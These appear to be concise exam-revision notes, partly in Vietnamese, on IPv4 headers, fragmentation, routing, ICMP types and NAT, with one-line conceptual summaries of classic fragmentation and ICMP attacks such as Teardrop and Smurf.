- Min 20 bytes: Ver(4b), IHL(4b), ToS(8b), TotalLen(16b), ID(16b), Flags(3b), Offset(13b), TTL(8b), Proto(8b), Chksum(16b), SrcIP(32b), DstIP(32b)
- Max size: 65,535 bytes (16-bit Total Length)
- TTL: Decremented mỗi hop, = 0 → drop + ICMP Type 11
- Offset: ÷ 8 (address 65,528 bytes)
3. FRAGMENTATION¤
- MTU: 1500 bytes (Ethernet)
- Reassembly: CHỈ at destination
- Offset = data_bytes ÷ 8
- Flags: 1 = More Fragments, 0 = Last
4. FRAGMENTATION ATTACKS¤
- Ping of Death: Packet > 65,536 bytes → buffer overflow
- Teardrop: Overlapping fragments → negative gap
- DoS: 2 packets (offset 0 & 65535) → tie 64KB resources
5. ROUTING¤
- Rule: Longest match
- RPF: Reverse lookup, symmetric = Allow, asymmetric = Drop
- Config: Routers (OSPF, BGP), Hosts (DHCP, default, manual, ICMP redirect)
6. ICMP TYPES¤
- 0: Echo Reply (ping)
- 3: Dest Unreachable (code 0=net, 1=host, 3=port)
- 5: Redirect (MITM!)
- 8: Echo Request (ping)
- 11: TTL Expired (traceroute)
7. ICMP ATTACKS¤
- Redirect: MITM, CHỈ local (same LAN), RPF blocks remote
- Smurf: Spoof src=victim, dst=broadcast → all reply victim
- Flooding: Massive ICMP → DoS
8. NAT¤
- Mục đích: All local devices share 1 public IP
- Table: WAN addr:port ↔ LAN addr:port
- Outgoing: Change src to NAT IP:new port
CHUẨN BỊ THI: Nhớ kỹ IP header fields, TTL traceroute, fragmentation (offset ÷ 8, reassembly at dest), 3 fragmentation attacks, longest match routing, RPF, ICMP types (0,3,5,8,11), ICMP attacks limitations (local only, RPF), và NAT translation!